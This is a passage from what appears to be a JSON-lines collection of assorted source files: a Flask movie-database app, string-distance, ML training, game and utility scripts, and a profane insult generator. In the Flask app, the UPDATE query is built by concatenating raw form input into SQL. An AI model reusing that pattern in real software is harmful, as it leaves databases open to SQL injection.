request.form['year_died_insert']\n insert_query = 'INSERT INTO director (first_name, last_name, year_born, year_died) VALUES (%s,%s,%s,%s)'\n data = (first_name, last_name, year_born, year_died)\n execute_query(db_connection, insert_query, data)\n else:\n valid_update_query = False\n\n # If the user has potentially entered UPDATE information, prepare the UPDATE query\n if valid_update_query:\n update_string = ''\n num_args = 0\n \n if first_name != '':\n update_string += \"first_name = \\'\" + first_name + '\\', '\n num_args += 1\n if last_name != '':\n update_string += \"last_name = \\'\" + last_name + '\\', '\n num_args += 1\n if year_born != '':\n update_string += \"year_born = \\'\" + year_born + '\\', '\n num_args += 1\n if year_died != '':\n update_string += \"year_died = \\'\" + year_died + '\\' '\n num_args += 1\n\n # If no arguments, this is not an UPDATE query\n if num_args == 0:\n valid_update_query = False\n elif num_args >= 1: # If one or more arguments, strip trailing comma\n update_string = update_string.rstrip(', ') + ' '\n \n # If this has proven to be a UPDATE query, perform it \n if valid_update_query:\n update_query = \"UPDATE director SET \" + update_string + \"WHERE id = %s\" % (director_selected) + \";\"\n webapp.logger.error(update_query)\n execute_query(db_connection, update_query);\n flash(\"Entry updated!\")\n\n # If the user has not entered a fname, lname, and year_born, this is an invalid query\n #if fname = '' || lname = '' || year_born = '':\n # valid_query = False\n\n # Populate Director Dropdown\n query = \"SELECT id, last_name FROM director;\"\n result = execute_query(db_connection, query).fetchall();\n print(result)\n\n # Populate Film Dropdown\n film_query = \"SELECT id, title FROM film;\"\n film_results = execute_query(db_connection, film_query).fetchall()\n \n # Populate Films with Selected Director Table\n query2 = \"SELECT id, title, language, year, runtime FROM film f INNER JOIN film_direction d ON f.id = d.film_id AND d.director_id = %s\" % (director_selected)\n result2 = execute_query(db_connection, query2).fetchall();\n return render_template('directors.html', directors=result, director_id=director_selected, films=film_results, rows=result2);\n","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":11188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"541001662","text":"def calculate(m, n):\n if len(m) == 0 or len(n) == 0:\n return max(len(n), len(m))\n if len(n) < len(m):\n m, n = n, m\n current_row = [i + 1 for i in range(len(m))]\n if m.find(n[0]) >= 0:\n for i in range(m.find(n[0]), len(m)):\n current_row[i] -= 1\n for i in range(1, len(n)):\n previous_row = current_row[:]\n for j in range(0, len(m)):\n add_to_m = add_to_mn = transposition = float(\"inf\")\n if j > 0:\n add_to_m = current_row[j - 1] + 1\n add_to_n = previous_row[j] + 1\n if m[j] == n[i] != n[i-1]:\n add_to_n -= 1\n if j > 0 and i > 0:\n if m[j] == n[i]:\n add_to_mn = previous_row[j - 1]\n else:\n add_to_mn = previous_row[j - 1] + 1\n if m[j] == n[i - 1] and m[j - 1] == n[i]:\n transposition = previous_row[j - 1]\n else:\n transposition = previous_row[j - 1] + 1\n current_row[j] = min(add_to_m, add_to_n, add_to_mn, transposition)\n return current_row[len(m) - 1]\n\n\nif __name__ == '__main__':\n m = input()\n n = input()\n print(calculate(m, 
n))","sub_path":"lab18/Evtushenko/damerau_levenshtien.py","file_name":"damerau_levenshtien.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"411640730","text":"import os, sys\r\nimport datasets.dataloader as dd\r\nfrom keras.optimizers import *\r\nfrom keras.callbacks import *\r\nfrom models.GAHs import GAHs_trans\r\n\r\nitokens, otokens = dd.MakeS2SDict('datasets/data/en2de.s2s.txt', dict_file='datasets/data/en2de_word.txt')\r\nXtrain, Ytrain = dd.MakeS2SData('datasets/data/en2de.s2s.txt', itokens, otokens, h5_file='datasets/data/en2de.h5')\r\nXvalid, Yvalid = dd.MakeS2SData('datasets/data/en2de.s2s.valid.txt', itokens, otokens, h5_file='datasets/data/en2de.valid.h5')\r\n\r\nprint('seq 1 words:', itokens.num())\r\nprint('seq 2 words:', otokens.num())\r\nprint('train shapes:', Xtrain.shape, Ytrain.shape)\r\nprint('valid shapes:', Xvalid.shape, Yvalid.shape)\r\n\r\n'''\r\nfrom rnn_s2s import RNNSeq2Seq\r\ns2s = RNNSeq2Seq(itokens,otokens, 256)\r\ns2s.compile('rmsprop')\r\ns2s.model.fit([Xtrain, Ytrain], None, batch_size=64, epochs=30, validation_data=([Xvalid, Yvalid], None))\r\n'''\r\n\r\nfrom models.Transformer import Transformer_trans, LRSchedulerPerStep\r\n\r\nd_model = 256\t# embedding is 256 ? but there is no embedding I guess??\r\ns2s = Transformer_trans(itokens, otokens, len_limit=70, d_model=d_model, d_inner_hid=512, \\\r\n\t\t\t\t n_head=8, layers=2, dropout=0.1)\r\n\r\n# s2s = GAHs_trans(itokens, otokens, len_limit=70, d_model=d_model, d_inner_hid=512, \\\r\n# \t\t\t\t n_head=8, layers=2, dropout=0.1)\r\n\r\nmfile = 'saved_model/en2de.'+s2s.__class__.__name__+'model.h5'\r\n\r\nlr_scheduler = LRSchedulerPerStep(d_model, 4000) \r\nmodel_saver = ModelCheckpoint(mfile, save_best_only=True, save_weights_only=True)\r\n\r\ns2s.compile(Adam(0.001, 0.9, 0.98, epsilon=1e-9))\r\ntry: s2s.model.load_weights(mfile)\r\nexcept: print('\\n\\nnew model')\r\n\r\nif 'eval' in sys.argv:\r\n\tfor x, y in s2s.beam_search('A black dog eats food .'.split(), delimiter=' '):\r\n\t\tprint(x, y)\r\n\tprint(s2s.decode_sequence_readout('A black dog eats food .'.split(), delimiter=' '))\r\n\tprint(s2s.decode_sequence_fast('A black dog eats food .'.split(), delimiter=' '))\r\n\twhile True:\r\n\t\tquest = input('> ')\r\n\t\tprint(s2s.decode_sequence_fast(quest.split(), delimiter=' '))\r\n\t\trets = s2s.beam_search(quest.split(), delimiter=' ')\r\n\t\tfor x, y in rets: print(x, y)\r\nelif 'test' in sys.argv:\r\n\timport datasets.ljqpy as ljqpy\r\n\tvalids = ljqpy.LoadCSV('datasets/data/en2de.s2s.valid.txt')\t# np.array([ [en_sent, de_sent] ]) \r\n\ten = [x[0].split() for x in valids[:100]]\t# np.array([ [token_list] ]), e.g. 
[['a', 'man', 'went']]\r\n\r\n\trets = s2s.decode_sequence_readout(en, delimiter=' ')\r\n\tfor i,x in enumerate(rets[:5]): \r\n\t\tprint(i,':',x)\r\n\r\n\trets = s2s.beam_search(en, delimiter=' ', verbose=1)\r\n\tfor i, x in enumerate(rets[:5]):\r\n\t\tprint('-'*20)\r\n\t\tprint(valids[i][1])\r\n\t\tfor y in x: print(y)\r\n\r\n\trets = s2s.decode_sequence_fast(en, delimiter=' ', verbose=1)\r\n\tfor i,x in enumerate(rets[:5]): \r\n\t\tprint(i,':',x)\r\n\r\nelse:\r\n\ts2s.model.summary()\r\n\ts2s.model.fit([Xtrain, Ytrain], None, batch_size=64, epochs=20, \\\r\n\t\t\t\tvalidation_data=([Xvalid, Yvalid], None), \\\r\n\t\t\t\tcallbacks=[lr_scheduler, model_saver])\r\n\t# val_accu @ 30 epoch: 0.7045","sub_path":"en2de_main.py","file_name":"en2de_main.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"560391887","text":"import collections\n\n\nclass UndirectedGraphNode:\n def __init__(self, x):\n self.label = x\n self.neighbors = []\n\n\nclass Solution:\n \"\"\"\n @param: node: An undirected graph node\n @return: An undirected graph node\n \"\"\"\n def cloneGraph(self, node):\n if node is None:\n return None\n\n nodes = self.get_nodes(node)\n\n mapper = {}\n\n for original_node in nodes:\n mapper[original_node] = UndirectedGraphNode(original_node.label)\n\n for original_node in nodes:\n for original_neighbor in original_node.neighbors:\n mapper[original_node].neighbors.append(mapper[original_neighbor])\n\n return mapper[node]\n \n def get_nodes(self, node):\n queue = collections.deque([node])\n nodes = set([node])\n\n while queue:\n current_node = queue.popleft()\n\n for neighbor in current_node.neighbors:\n if neighbor not in nodes:\n nodes.add(neighbor)\n queue.append(neighbor)\n\n return nodes","sub_path":"US Giants/Search & Recursion/137. 
Clone Graph.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"503874326","text":"from webscrap import wlog\r\nfrom webscrap import wscrap\r\n\r\nwlog.set_custom_log_info('html/error.log')\r\n\r\nnews_scrap = wscrap.NewsScraper(wscrap.url_aj, wlog)\r\nnews_scrap.retrive_webpage()\r\nnews_scrap.write_webpage_as_html()\r\n\r\nnews_scrap.read_webpage_from_html()\r\nnews_scrap.convert_data_to_bs4()\r\nnews_scrap.print_data()\r\nnews_scrap.parse_soup_to_simple_html()\r\n\r\n\r\n# try:\r\n# raise Exception\r\n# except Exception as e:\r\n# Wlog.report(e)","sub_path":"scraping/chapter4.py","file_name":"chapter4.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"154601432","text":"from django.conf.urls import url\nfrom my_blog import views\nfrom django.contrib.auth.decorators import permission_required\n\n\nurlpatterns = [\n url(r'^page/(?P\\d+)/$', views.ArticlesMain.as_view(), name='articles_main'),\n url(r'^$', views.ArticlesMain.as_view(), name='articles_main'),\n url(r'^article/(?P\\d+)/$', views.ArticleFully.as_view(), name='article_fully'),\n url(r'^articles_archive/$', views.ArticlesArchive.as_view(), name='articles_archive'),\n url(r'^category/(?P\\d+)/$', views.ArticlesCategory.as_view(), name='category_articles'),\n url(r'^create_art/$',\n permission_required('my_blog.add_article')(views.CreateArticle.as_view()), name='article_create'),\n url(r'^update_art/(?P\\d+)/$',\n permission_required('my_blog.change_article')(views.UpdateArticle.as_view()), name='article_update'),\n url(r'^delete_art/(?P\\d+)/$',\n permission_required('my_blog.delete_article')(views.DeleteArticle.as_view()), name='article_delete'),\n]\n","sub_path":"my_blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"105003138","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 24 11:40:58 2019\n\n@author: awesome_k\n\"\"\"\n\nimport random\nimport time\n\nmyScore = 0\ncompScore = 0\ndraw = 0\n\nrps = ['r', 's', 'p']\n\nplayAgain = 'y'\n\nwhile playAgain == 'y':\n myChoice = input('Make a move! r/s/p')\n compChoice = random.choice(rps)\n\n if myChoice[0].lower() == compChoice:\n print('Draw!')\n time.sleep(2)\n draw = draw + 1\n elif myChoice[0].lower() == 'r' and compChoice == 's':\n print('You chose rock and the computer chose scissors. You win!')\n time.sleep(2)\n myScore = myScore + 1\n elif myChoice[0].lower() == 'r' and compChoice == 'p':\n print('You chose rock and the computer chose paper. You lose!')\n time.sleep(2)\n compScore = compScore + 1\n elif myChoice[0].lower() == 'p' and compChoice == 'r':\n print('You chose paper and the computer chose rock. You win!')\n time.sleep(2)\n myScore = myScore + 1\n elif myChoice[0].lower() == 'p' and compChoice == 's':\n print('You chose paper and the computer chose scissors. You lose!')\n time.sleep(2)\n compScore = compScore + 1\n elif myChoice[0].lower() == 's' and compChoice == 'r':\n print('You chose scissors and the computer chose rock. You lose!')\n time.sleep(2)\n compScore = compScore + 1\n elif myChoice[0].lower() == 's' and compChoice == 'p':\n print('You chose scissors and the computer chose paper. 
You win!')\n time.sleep(2)\n myScore = myScore + 1\n else:\n print('Invalid entry.')\n time.sleep(2)\n\n playAgain = input('Do you want to play again? (y/n)')\n if playAgain == 'n':\n print('Thanks bye!')\n if playAgain == 'sc':\n print('Human ' + str(myScore), 'Computer ' + str(compScore), 'Draw ' + str(draw))","sub_path":"rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"188958123","text":"# Load base config file\nfrom dxConfig import dxConfig;\n# Add CrashInfo group if it doesn't exist.\ndxCrashInfoConfig = dxConfig.get(\"CrashInfo\", {});\n# Add default values where no values have been supplied:\nfor (sName, xValue) in {\n \"bOutputIO\": False, # Output cdb i/o while debugging application\n \"uMaxAddressOffset\": 0xFFF, # How far from an address can a pointer be offset and still be considered to point to it?\n \"uMaxFunctionOffset\": 0xFFF, # How far from a function symbol can a pointer be offset and still be considered to point to it?\n \"uMaxStackFramesCount\": 20, # How many stack frames are retrieved for analysis?\n \"uStackHashFramesCount\": 3, # How many stack frames are hashed for the crash id?\n \"asSymbolCachePaths\": [], # Where are symbols cached?\n \"bOutputFirstChanceExceptions\": False, # Are first chance exceptions detected and output?\n \"bOutputCommandLine\": False, # Is the cdb.exe command line printed before execution?\n \"bDebugSymbolLoading\": False, # Enable noisy symbol loading in cdb.\n}.items():\n if sName not in dxCrashInfoConfig:\n dxCrashInfoConfig[sName] = xValue;\n","sub_path":"cCrashInfo/dxCrashInfoConfig.py","file_name":"dxCrashInfoConfig.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"318420444","text":"import random, typing\r\nimport Lists, RecentGen\r\n\r\ndef respond(message: typing.AnyStr, gen_type: int=1) -> str:\r\n if gen_type == 1:\r\n return msg_response(message)\r\n elif gen_type == 2:\r\n return Lists.errorMsgGen(1)\r\n\r\n\r\ndef msg_response(message: typing.AnyStr) -> str:\r\n question_type = classify(message)\r\n if question_type == \"why\":\r\n msg = Lists.introGen(3, 1)+Lists.nounGen(1)+\" \"+Lists.verbGen(1)+\" \"+Lists.nounGen(1)\r\n elif question_type == 'how':\r\n msg = \"With \"+Lists.nounGen(1)\r\n elif question_type == 'who' or question_type == 'what':\r\n msg = Lists.nounGen(1)\r\n elif question_type == 'when':\r\n msg = Lists.timeGen()\r\n else:\r\n msg = retaliate()\r\n \r\n return msg\r\n\r\n\r\ndef classify(message: typing.AnyStr) -> str:\r\n if \"why\" in message: return \"why\"\r\n elif \"how\" in message: return \"how\"\r\n elif \"who\" in message: return \"who\"\r\n elif \"what\" in message or \"which\" in message: return \"what\"\r\n elif \"when\" in message: return \"when\"\r\n \r\n return None\r\n\r\n\r\ndef shitpost(): # Uses returned intros, verbs, and nouns to create a coherent shitpost\r\n a = random.randint(0,10)\r\n if a < 5:\r\n intro = Lists.introGen(1, None)\r\n end = \".\"\r\n else:\r\n intro = Lists.introGen(2, None)\r\n end = \"?\"\r\n b = random.randint(0,100)\r\n if b < 50:\r\n verb = Lists.verbGen(1)+\" \"\r\n noun = Lists.nounGen(1)\r\n elif 68 > b > 50:\r\n verb = Lists.verbGen(2)+\" \"\r\n noun = Lists.nounGen(2)\r\n elif 90 > b > 68:\r\n shit = Lists.phraseGen(1)\r\n return(shit) \r\n else:\r\n verb = Lists.verbGen(3) # ends without noun\r\n noun 
= \"\"\r\n shit = intro+verb+noun+end\r\n return(shit)\r\n\r\n\r\ndef retaliate():\r\n chance = random.randint(0,100)\r\n if chance <= 40:\r\n chance = random.randint(0,100)\r\n if chance <= 25:\r\n retaliation = \"You are \"+Lists.adjectiveGen(1)+\"and \"+Lists.adjectiveGen(1)\r\n elif 25 < chance <= 50:\r\n retaliation = \"You are \"+Lists.adjectiveGen(1)\r\n elif 50 < chance <= 75:\r\n retaliation = \"You are \"+Lists.adverbGen()+Lists.adjectiveGen(1)\r\n else:\r\n retaliation = \"Your \"+Lists.nounGen(3)+\" are \"+Lists.adjectiveGen(1) \r\n elif 41 < chance <= 90:\r\n chance = random.randint(0,100)\r\n if chance <= 33:\r\n retaliation = Lists.introGen(4, None)+Lists.verbGen(1)+\" your \"+Lists.adjectiveGen(1)+\"fucking \"+Lists.nounGen(3)\r\n elif 33 < chance <= 66:\r\n retaliation = Lists.introGen(4, None)+Lists.verbGen(1)+\" your \"+Lists.adjectiveGen(1)+Lists.nounGen(3)\r\n else:\r\n retaliation = Lists.introGen(4, None)+Lists.verbGen(1)+\" your \"+Lists.nounGen(3)\r\n elif chance > 85:\r\n retaliation = Lists.phraseGen(2)\r\n return retaliation","sub_path":"Writer.py","file_name":"Writer.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"120972325","text":"from machine import SPI,ADC\nfrom FlagArcade import *\nimport LCD\n\n# 螢幕初始設定\nspi = SPI(1, baudrate=40000000, polarity=0, phase=0)\nscreen = LCD.LCD(spi, 15, 5, 0)\nscreen.init()\nscreen.clearLCD()\n\n# 設定按鈕感測腳位\nadc = ADC(0)\n\nwhile True:\n val=adc.read()\n key=getKey(val)\n screen.text(10,10,\"val : \"+str(val)+\" \")\n screen.text(10,30,\"key : \"+key+\" \")","sub_path":"labs/lab07_keyDetect.py","file_name":"lab07_keyDetect.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"352068898","text":"\"\"\"\nTrain a VarNet model on the fastMRI dataset with MRAugment data augmentation. 
\n\nThe steps to add MRAugment to any training code is simple:\n 1) Initialize a DataAugmentor with desired augmentation parameters and probabilities\n 2) Pass augmentor to DataTransform that is applied to the training data\n 3) You are all set!\n \nSupports \n - scanner model based filtering of training and validation data\n - single-coil data with a simplified VarNet model\n\nCode based on https://github.com/facebookresearch/fastMRI/fastmri_examples/varnet/train_varnet_demo.py\n\"\"\"\n\nimport os, sys\nimport pathlib\nfrom argparse import ArgumentParser\n\nsys.path.insert(0, os.path.dirname(pathlib.Path(__file__).parent.absolute()) )\n\nimport pytorch_lightning as pl\nfrom fastmri.data.mri_data import fetch_dir\nfrom fastmri.data.subsample import create_mask_for_mask_type\nfrom fastmri.pl_modules import VarNetModule\n\n# MRAugment-specific imports\nfrom mraugment.data_augment import DataAugmentor\nfrom mraugment.data_transforms import VarNetDataTransform\nfrom pl_modules.fastmri_data_module import FastMriDataModule\n\n# Imports for logging and other utility\nfrom pytorch_lightning.plugins import DDPPlugin\nimport yaml\nfrom utils import load_args_from_config\nimport torch.distributed\nfrom pl_modules.singlecoil_varnet_module import SinglecoilVarNetModule\n\n\ndef cli_main(args):\n if args.verbose:\n print(args.__dict__)\n \n pl.seed_everything(args.seed)\n # ------------\n # model\n # ------------\n if args.challenge == 'multicoil':\n model = VarNetModule(\n num_cascades=args.num_cascades,\n pools=args.pools,\n chans=args.chans,\n sens_pools=args.sens_pools,\n sens_chans=args.sens_chans,\n lr=args.lr,\n lr_step_size=args.lr_step_size,\n lr_gamma=args.lr_gamma,\n weight_decay=args.weight_decay,\n )\n else:\n assert args.challenge == 'singlecoil'\n model = SinglecoilVarNetModule(\n num_cascades=args.num_cascades,\n pools=args.pools,\n chans=args.chans,\n lr=args.lr,\n lr_step_size=args.lr_step_size,\n lr_gamma=args.lr_gamma,\n weight_decay=args.weight_decay,\n )\n\n # -----------------\n # data augmentation\n # -----------------\n # pass an external function to DataAugmentor that \n # returns the current epoch for p scheduling\n current_epoch_fn = lambda: model.current_epoch\n \n # initialize data augmentation pipeline\n augmentor = DataAugmentor(args, current_epoch_fn)\n \n # ------------\n # data\n # ------------\n # this creates a k-space mask for transforming input data\n mask = create_mask_for_mask_type(\n args.mask_type, args.center_fractions, args.accelerations\n )\n \n # use random masks for train transform, fixed masks for val transform\n # pass data augmentor to train transform only\n train_transform = VarNetDataTransform(augmentor=augmentor, mask_func=mask, use_seed=False)\n val_transform = VarNetDataTransform(mask_func=mask)\n test_transform = VarNetDataTransform()\n \n # ptl data module - this handles data loaders\n data_module = FastMriDataModule(\n data_path=args.data_path,\n challenge=args.challenge,\n train_transform=train_transform,\n val_transform=val_transform,\n test_transform=test_transform,\n test_split=args.test_split,\n test_path=args.test_path,\n sample_rate=args.sample_rate,\n volume_sample_rate=args.volume_sample_rate,\n use_dataset_cache_file=args.use_dataset_cache_file,\n batch_size=args.batch_size,\n num_workers=args.num_workers,\n distributed_sampler=(args.accelerator in (\"ddp\", \"ddp_cpu\")),\n combine_train_val=args.combine_train_val,\n train_scanners=args.train_scanners,\n val_scanners=args.val_scanners,\n 
combined_scanner_val=args.combined_scanner_val,\n )\n\n # ------------\n # trainer\n # ------------\n trainer = pl.Trainer.from_argparse_args(args, \n plugins=DDPPlugin(find_unused_parameters=False),\n checkpoint_callback=True,\n callbacks=args.checkpoint_callback)\n \n # Save all hyperparameters to .yaml file in the current log dir\n if torch.distributed.is_available():\n if torch.distributed.is_initialized():\n if torch.distributed.get_rank() == 0:\n save_all_hparams(trainer, args)\n else: \n save_all_hparams(trainer, args)\n \n # ------------\n # run\n # ------------\n trainer.fit(model, datamodule=data_module)\n\ndef save_all_hparams(trainer, args):\n if not os.path.exists(trainer.logger.log_dir):\n os.makedirs(trainer.logger.log_dir)\n save_dict = args.__dict__\n save_dict.pop('checkpoint_callback')\n with open(trainer.logger.log_dir + '/hparams.yaml', 'w') as f:\n yaml.dump(save_dict, f)\n \ndef build_args():\n parser = ArgumentParser()\n\n # basic args\n backend = \"ddp\"\n num_gpus = 2 if backend == \"ddp\" else 1\n batch_size = 1\n\n # client arguments\n parser.add_argument(\n '--config_file', \n default=None, \n type=pathlib.Path, \n help='If given, experiment configuration will be loaded from this yaml file.',\n )\n parser.add_argument(\n '--verbose', \n default=False, \n action='store_true', \n help='If set, print all command line arguments at startup.',\n )\n\n # data transform params\n parser.add_argument(\n \"--mask_type\",\n choices=(\"random\", \"equispaced\"),\n default=\"equispaced\",\n type=str,\n help=\"Type of k-space mask\",\n )\n parser.add_argument(\n \"--center_fractions\",\n nargs=\"+\",\n default=[0.04],\n type=float,\n help=\"Number of center lines to use in mask\",\n )\n parser.add_argument(\n \"--accelerations\",\n nargs=\"+\",\n default=[8],\n type=int,\n help=\"Acceleration rates to use for masks\",\n )\n\n # data config\n parser = FastMriDataModule.add_data_specific_args(parser)\n parser.set_defaults(\n mask_type=\"random\", # random masks for knee data\n batch_size=batch_size, # number of samples per batch\n test_path=None, # path for test split, overwrites data_path\n )\n \n # data augmentation config\n parser = DataAugmentor.add_augmentation_specific_args(parser)\n\n # module config\n parser = VarNetModule.add_model_specific_args(parser)\n parser.set_defaults(\n num_cascades=12, # number of unrolled iterations\n pools=4, # number of pooling layers for U-Net\n chans=18, # number of top-level channels for U-Net\n sens_pools=4, # number of pooling layers for sense est. U-Net\n sens_chans=8, # number of top-level channels for sense est. 
U-Net\n lr=0.0003, # Adam learning rate\n lr_step_size=40, # epoch at which to decrease learning rate\n lr_gamma=0.1, # extent to which to decrease learning rate\n weight_decay=0.0, # weight regularization strength\n )\n\n # trainer config\n parser = pl.Trainer.add_argparse_args(parser)\n parser.set_defaults(\n gpus=num_gpus, # number of gpus to use\n replace_sampler_ddp=False, # this is necessary for volume dispatch during val\n accelerator=backend, # what distributed version to use\n seed=42, # random seed\n deterministic=True, # makes things slower, but deterministic\n )\n\n args = parser.parse_args()\n \n # Load args if config file is given\n if args.config_file is not None:\n args = load_args_from_config(args)\n \n\n args.checkpoint_callback = pl.callbacks.ModelCheckpoint(\n save_top_k=1,\n verbose=True,\n monitor=\"val_metrics/ssim\",\n mode=\"max\",\n filename='epoch{epoch}-ssim{val_metrics/ssim:.4f}',\n auto_insert_metric_name=False,\n save_last=True\n )\n\n return args\n\n\ndef run_cli():\n args = build_args()\n\n # ---------------------\n # RUN TRAINING\n # ---------------------\n cli_main(args)\n\n\nif __name__ == \"__main__\":\n run_cli()","sub_path":"mraugment_examples/train_varnet_fastmri.py","file_name":"train_varnet_fastmri.py","file_ext":"py","file_size_in_byte":8313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"532202849","text":"n = int(input('Digite um numero de termos que quer ver: '))\r\ns1 = 0\r\ns2 = 1\r\ncont = 2\r\nif n == 1:\r\n print('0')\r\nelif n == 2:\r\n print('0 - 1')\r\nelse:\r\n while cont < n:\r\n s3 = s1+s2\r\n s1 = s2\r\n s2 = s3\r\n cont += 1\r\n print('0 - 1 - {} - '.format(s3), end='')\r\n\r\n\r\n","sub_path":"063-fibonacci.py","file_name":"063-fibonacci.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"457866872","text":"import util\nimport pandas as pd\n\ndef test_location_tier():\n assert util.get_location_tier('kothanur') == 'tier1'\n assert util.get_location_tier('Lingadheeranahalli') == 'tier2'\n\ndef test_home_prediction():\n model = util.get_saved_model()\n\n location = 'Electronic City Phase II'\n tier = util.get_location_tier(location)\n\n X = [\n [\n 1056,\n 2, # bath\n 2, # bhk\n 1 if tier == 'tier1' else 0,\n 1 if tier == 'tier2' else 0,\n 1 if tier == 'tier3' else 0,\n 1 if tier == 'tier4' else 0,\n 1 if tier == 'tier5' else 0\n ]\n ]\n\n y_truth = 39.07\n\n result = model.predict(X)\n\n # 20% above and below truth value is assumed to be okay prediction\n assert result[0] <= y_truth*(1+0.2) and result[0]>=y_truth*(1-0.2)\n","sub_path":"DataScience/BangloreHomePrices/server/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"211764563","text":"# uncompyle6 version 3.6.7\n# Python bytecode 3.3 (3230)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/cary/__main__.py\n# Compiled at: 2015-08-06 11:53:39\n# Size of source mod 2**32: 1595 bytes\nimport sys, logging\nfrom importlib.machinery import SourceFileLoader\nimport argparse\nfrom cary.caryapp import CaryApp\n\ndef configure_cary(app, config):\n app.allowed_addresses = config.ALLOW_FROM_ADDRESSES\n app.smtp_host = config.SMTP_HOST\n app.return_address = config.SMTP_RETURN_ADDRESS\n app.should_clean_up 
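The three-step recipe from the docstring above can be condensed into a small helper. This is a hedged sketch that reuses only calls already shown in the script (DataAugmentor, create_mask_for_mask_type, VarNetDataTransform); args and model are assumed to be the parsed CLI namespace and the Lightning module from cli_main().

from fastmri.data.subsample import create_mask_for_mask_type
from mraugment.data_augment import DataAugmentor
from mraugment.data_transforms import VarNetDataTransform

def build_train_transform(args, model):
    # step 1: DataAugmentor takes the parsed augmentation args plus a
    # callback returning the current epoch, used for probability scheduling
    augmentor = DataAugmentor(args, lambda: model.current_epoch)
    # step 2: attach the augmentor to the *training* transform only
    mask = create_mask_for_mask_type(args.mask_type, args.center_fractions, args.accelerations)
    return VarNetDataTransform(augmentor=augmentor, mask_func=mask, use_seed=False)
    # step 3: pass the result to FastMriDataModule as train_transform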
= config.SHOULD_CLEAN_UP\n app.should_respond = config.SHOULD_RESPOND\n app.workspace = config.WORKSPACE_DIR\n for name, (cmd_class, cmd_config) in config.COMMANDS.items():\n cmd = cmd_class()\n cmd.set_config(cmd_config, WORKSPACE_DIR=config.WORKSPACE_DIR, FROM_ADDRESS=config.FROM_ADDRESS)\n app.add_command(name, cmd)\n\n\ndef setup_logging(config):\n logging.basicConfig(filename=config.LOG_FILE, level=config.LOG_LEVEL, format=config.LOG_FORMAT)\n logging.info('Log opened')\n\n\ndef main():\n parser = argparse.ArgumentParser(description='process email message as an offline assistant')\n parser.add_argument('--settings', type=str, help='name of the local settings module', default='local_conf.py')\n args = parser.parse_args()\n config = SourceFileLoader('local_conf', args.settings).load_module()\n setup_logging(config)\n app = CaryApp()\n try:\n configure_cary(app, config)\n msg = sys.stdin.read()\n app.process_message(msg)\n except:\n logging.exception('Serious error on initialization/processing')\n\n\nif __name__ == '__main__':\n main()","sub_path":"pycfiles/caryocar-0.0.1-py3-none-any/__main__.cpython-33.py","file_name":"__main__.cpython-33.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"281495502","text":"class Skill:\n def __init__(self, activationWords, handler, name):\n self.activationWords = activationWords\n self.handler = handler\n if not name.endswith(\"_skill\"):\n raise Exception(\"\\n\\nWrong skill name! Must end with '_skill'\")\n self.name = name\n\n def executeHandler(self, *args):\n return self.handler(args)\n\n def export(self):\n filename = self.name + \".daskill\"\n\n try:\n import dill\n except:\n import os\n os.system(\"python3 -m pip install dill\")\n os.system(\"python -m pip install dill\")\n import dill\n\n with open(filename, \"wb\") as file:\n dill.dump(self, file)\n print(f\"Successfully saved skill {self.name} in the following file: {filename}\")\n","sub_path":"Skill.py","file_name":"Skill.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"179411259","text":"import discord\n\nfrom data_handler import User\n\nversion = \"v2.0.0\"\ninvite = \"https://discord.gg/DpxkY3x\"\n\n\ndef is_manager(ctx):\n role = discord.utils.get(ctx.guild.roles, name=\"Manager\")\n if role in ctx.author.roles:\n return True\n","sub_path":"utils/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"50978973","text":"\"\"\"\n# Copyright 2021 21CN Corporation Limited\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\nimport json\nimport os\nimport threading\nimport uuid\nimport 